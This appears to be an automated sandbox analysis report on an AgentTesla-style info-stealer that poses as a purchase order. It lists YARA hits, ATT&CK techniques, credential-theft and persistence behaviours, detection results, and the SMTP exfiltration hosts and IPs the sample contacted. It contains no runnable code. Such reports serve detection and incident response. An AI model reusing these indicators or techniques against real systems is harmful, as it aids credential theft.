                    Source: Yara matchFile source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		1
                    Credentials in Registry                    		114
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		11
                    Deobfuscate/Decode Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                    Obfuscated Files or Information                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626538 Sample: Purchase order 450080088 pr... Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 67 us2.smtp.mailhostbox.com 2->67 69 smtp.transmase.com 2->69 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Multi AV Scanner detection for dropped file 2->87 89 14 other signatures 2->89 8 Purchase order 450080088 proj. Allt Charnan.exe 7 2->8         started        12 jVULYR.exe 2->12         started        14 jVULYR.exe 2->14         started        signatures3 process4 file5 49 C:\Users\user\AppData\Roaming49pPgfycY.exe, PE32 8->49 dropped 51 C:\Users\...51pPgfycY.exe:Zone.Identifier, ASCII 8->51 dropped 53 C:\Users\user\AppData\Local\...\tmp86F3.tmp, XML 8->53 dropped 55 Purchase order 450...llt Charnan.exe.log, ASCII 8->55 dropped 91 Adds a directory exclusion to Windows Defender 8->91 16 Purchase order 450080088 proj. Allt Charnan.exe 2 9 8->16         started        21 powershell.exe 25 8->21         started        23 schtasks.exe 1 8->23         started        25 Purchase order 450080088 proj. Allt Charnan.exe 8->25         started        93 Multi AV Scanner detection for dropped file 12->93 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->95 97 Machine Learning detection for dropped file 12->97 99 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 12->99 27 jVULYR.exe 12->27         started        29 schtasks.exe 12->29         started        31 jVULYR.exe 14->31         started        33 schtasks.exe 14->33         started        signatures6 process7 dnsIp8 57 162.222.225.16, 49752, 587 PUBLIC-DOMAIN-REGISTRYUS United States 16->57 59 us2.smtp.mailhostbox.com 208.91.198.38, 49747, 49823, 49837 PUBLIC-DOMAIN-REGISTRYUS United States 16->59 65 2 other IPs or domains 16->65 43 C:\Users\user\AppData\Roaming\...\jVULYR.exe, PE32 16->43 dropped 45 C:\Windows\System32\drivers\etc\hosts, ASCII 16->45 dropped 47 C:\Users\user\...\jVULYR.exe:Zone.Identifier, ASCII 16->47 dropped 71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->71 73 Tries to steal Mail credentials (via file / registry access) 16->73 75 Modifies the hosts file 16->75 77 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->77 35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        61 smtp.transmase.com 27->61 39 conhost.exe 29->39         started        63 smtp.transmase.com 31->63 79 Tries to harvest and steal ftp login credentials 31->79 81 Tries to harvest and steal browser information (history, passwords, etc) 31->81 41 conhost.exe 33->41         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Purchase order 450080088 proj. Allt Charnan.exe38%VirustotalBrowse
                    Purchase order 450080088 proj. Allt Charnan.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Purchase order 450080088 proj. Allt Charnan.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\NpPgfycY.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\NpPgfycY.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    29.0.jVULYR.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    25.2.jVULYR.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    29.0.jVULYR.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    29.2.jVULYR.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    25.0.jVULYR.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    25.0.jVULYR.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    25.0.jVULYR.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    25.0.jVULYR.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    29.0.jVULYR.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    29.0.jVULYR.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    29.0.jVULYR.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    25.0.jVULYR.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn:0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.fontbureau.comceu0%Avira URL Cloudsafe
                    http://www.fontbureau.comiona0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://smtp.transmase.com0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.fontbureau.com70%Avira URL Cloudsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.founder.com.cn/cng0%URL Reputationsafe
                    http://www.sajatypeworks.come0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    http://2FcFU77ZypH.org0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.fontbureau.comF0%URL Reputationsafe
                    http://www.founder.com.cn/cnaiL0%Avira URL Cloudsafe
                    http://www.fontbureau.comaL0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/S0%URL Reputationsafe
                    http://www.sajatypeworks.comt0%URL Reputationsafe
                    http://www.fontbureau.comcomd0%URL Reputationsafe
                    https://api.ipify.org%appdata0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.founder.com.cn/cn~0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/E0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://www.fontbureau.commS0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.comituL0%Avira URL Cloudsafe
                    http://TwQUlE.com0%Avira URL Cloudsafe
                    http://www.fontbureau.comh0%URL Reputationsafe
                    http://www.founder.com.cn/cne-d0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/Y0-0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/h0%URL Reputationsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.fontbureau.comalic0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.198.38
                    		truefalse
                      		high
                      smtp.transmase.com
                      		unknown
                      		unknownfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bThePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://us2.smtp.mailhostbox.comPurchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn:Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246509021.0000000005E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.krPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comceuPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comionaPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.284755099.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.290951086.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.259064063.0000000005E6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244343928.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244364704.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cThePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://smtp.transmase.comPurchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519099942.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.519288235.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.520008150.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.519797643.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520534688.000000000318E000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.520325574.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsijVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleasePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleasePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com7Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cngPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246623797.0000000005E68000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246680153.0000000005E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sajatypeworks.comePurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 